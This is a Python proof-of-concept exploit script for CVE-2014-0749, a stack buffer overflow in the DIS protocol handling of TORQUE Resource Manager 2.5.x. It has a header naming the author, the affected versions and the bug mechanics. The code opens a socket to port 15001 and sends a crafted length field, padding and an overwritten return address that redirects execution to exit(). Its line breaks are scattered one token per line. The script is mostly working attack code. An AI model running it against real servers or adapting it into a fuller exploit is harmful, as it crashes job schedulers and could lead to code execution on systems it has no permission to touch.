#!/usr/bin/env python
# Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow stub
# Date: 27 May 2014
# Exploit Author: bwall - @botnet_hunter
# Vulnerability discovered by: MWR Labs
# CVE: CVE-2014-0749
# Vendor Homepage: http://www.adaptivecomputing.com/
# Software Link: http://www.adaptivecomputing.com/support/download-center/torque-download/
# Version: 2.5.13
# Tested on: Manjaro x64
# Description:
# A buffer overflow while parsing the DIS network communication protocol. It is triggered when requesting that
# a larger amount of data than the small buffer be read. The first digit supplied is the number of digits in the
# data, the next digits are the actual size of the buffer.
#
# This is an exploit stub, meant to be a quick proof of concept. This was built and tested for a 64 bit system
# with ASLR disabled. Since Adaptive Computing does not supply binary distributions, TORQUE will likely be
# compiled on the target system. The result of this exploit is intended to just point RIP at 'exit()'
import
socket
ip
=
"172.16.246.177"
port
=
15001
s
=
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
offset
=
143
header
=
str
(
len
(
str
(offset)))
+
str
(offset)
+
'1'
packet
=
header
packet
+
=
"\x00"
*
(
140
-
len
(packet))
packet
+
=
(
'\xc0\x18\x76\xf7\xff\x7f\x00\x00'
)
# exit() may require a different offset in your build
s.sendall(packet)
data
=
s.recv(
1024
)
s.close()